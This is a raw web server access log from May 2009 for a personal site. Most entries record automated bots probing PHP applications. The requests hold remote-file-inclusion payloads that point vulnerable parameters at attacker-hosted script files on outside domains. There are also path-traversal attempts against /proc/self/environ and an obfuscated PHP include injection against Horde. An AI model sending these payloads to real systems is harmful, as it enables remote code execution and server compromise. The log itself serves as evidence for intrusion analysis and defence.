85.214.29.137 - - [19/May/2009:09:12:30 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:12:30 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:12:31 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:31 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:35 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:35 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:35 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:12:43 -0700] "GET /logs/access_080606.log//errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:09:12:44 -0700] "GET /dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:09:12:44 -0700] "GET /logs/access_090107.log%20%20//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:09:12:44 -0700] "GET /logs//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:09:12:45 -0700] "GET /logs/access_080318.log%20%20//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:12:47 -0700] "GET /logs/access_080804.log%20%20//cards_eng.php//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:12:52 -0700] "GET /logs/access_080719.log/index2.php?DoAction=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:52 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:52 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:12:53 -0700] "GET /logs/access_080929.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:12:53 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:12:53 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:12:56 -0700] "GET /logs/access_090502.log/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:12:56 -0700] "GET /logs/access_090203.log/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:12:57 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [19/May/2009:09:13:11 -0700] "GET /logs/access_090209.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:13:22 -0700] "GET /logs/access_090126.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:13:23 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:13:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:13:26 -0700] "GET /index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:13:26 -0700] "GET /logs/access_090203.log/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:13:26 -0700] "GET /logs/access_080924.log/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:13:26 -0700] "GET /logs/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:13:26 -0700] "GET /logs/access_080528.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:13:26 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
70.90.108.169 - - [19/May/2009:09:13:26 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:09:13:30 -0700] "GET /path/index.php?id=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:09:13:30 -0700] "GET /logs/path/index.php?id=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:09:13:30 -0700] "GET /logs/access_080710.log%20%20/path/index.php?id=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:13:31 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.0" 200 100170 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:13:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:13:34 -0700] "GET /logs/access_071111.log//index.php?seite=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:13:34 -0700] "GET /logs/access_080319.log%20%20//install/install3.php?database=none&cabsolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:13:36 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:13:37 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:13:37 -0700] "GET /logs/access_080924.log/index1.php?dat=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:13:37 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:13:37 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:13:38 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:13:38 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:13:39 -0700] "GET /logs//index.php?seite=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:13:41 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:13:42 -0700] "GET /logs/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 100191 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:13:47 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:13:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
79.0.174.237 - - [19/May/2009:09:13:52 -0700] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:13:52 -0700] "GET /logs/access_080831.log%20%20//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:13:53 -0700] "GET /logs/access_080316.log//errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:13:53 -0700] "GET /errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.10 - - [19/May/2009:09:13:54 -0700] "GET /logs//errors.php?error=http://www.russianwomenabroad.com//poll/templates/simple/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:13:55 -0700] "GET /logs/access_090318.log//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:13:55 -0700] "GET /shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:13:55 -0700] "GET /logs//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:13:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:13:57 -0700] "GET /logs/access_080624.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:13:57 -0700] "GET /logs/access_080906.log%20%20//components/com_flyspray/startdown.php?file=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:13:57 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:13:57 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:09:13:58 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:14:01 -0700] "GET /logs/access_080221.log%20%20//install/install3.php?database=none&cabsolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:09:14:04 -0700] "GET /logs/access_081012.log%20%20/path/index.php?id=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:11 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:12 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:15 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:14:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:14:16 -0700] "GET /logs/access_080929.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:14:17 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:14:17 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:17 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:14:19 -0700] "GET /logs/access_090208.log//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:19 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:19 -0700] "GET /logs/access_080918.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:09:14:21 -0700] "GET /logs/access_090107.log//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:09:14:21 -0700] "GET /logs/access_080318.log//dfd_cart/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.29.32.146 - - [19/May/2009:09:14:22 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.246.20.221 - - [19/May/2009:09:14:22 -0700] "GET /logs/access_080602.log//cards_eng.php//?_SERVER[DOCUMENT_ROOT]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:14:26 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 200 42080 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:14:28 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
69.248.128.84 - - [19/May/2009:09:14:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:14:38 -0700] "GET //vwar/backup/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:14:38 -0700] "GET /logs/access_080902.log///vwar/backup/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:14:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:14:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:14:41 -0700] "GET /logs/access_080624.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:14:42 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:14:42 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:14:43 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.210.221 - - [19/May/2009:09:14:47 -0700] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.210.221 - - [19/May/2009:09:14:47 -0700] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.210.221 - - [19/May/2009:09:14:47 -0700] "GET /logs/access_090301.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.139.104.104 - - [19/May/2009:09:14:47 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 200 42080 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:14:54 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:14:54 -0700] "GET /logs/access_081021.log///vwar/backup/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:14:55 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:14:55 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:14:59 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:15:00 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:15:01 -0700] "GET /?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:15:01 -0700] "GET /index.php?seite=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:15:01 -0700] "GET /logs/access_080929.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:15:01 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:09:15:02 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:15:03 -0700] "GET /logs/access_071111.log//index.php?seite=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:15:08 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.43 - - [19/May/2009:09:15:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:15:09 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:15:09 -0700] "GET /logs/access_090223.log%20%20/?sourcedir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:15:09 -0700] "GET /logs//index.php?seite=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:15:12 -0700] "GET /logs//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:15:12 -0700] "GET /shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:15:12 -0700] "GET /logs/access_090318.log//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:15:25 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
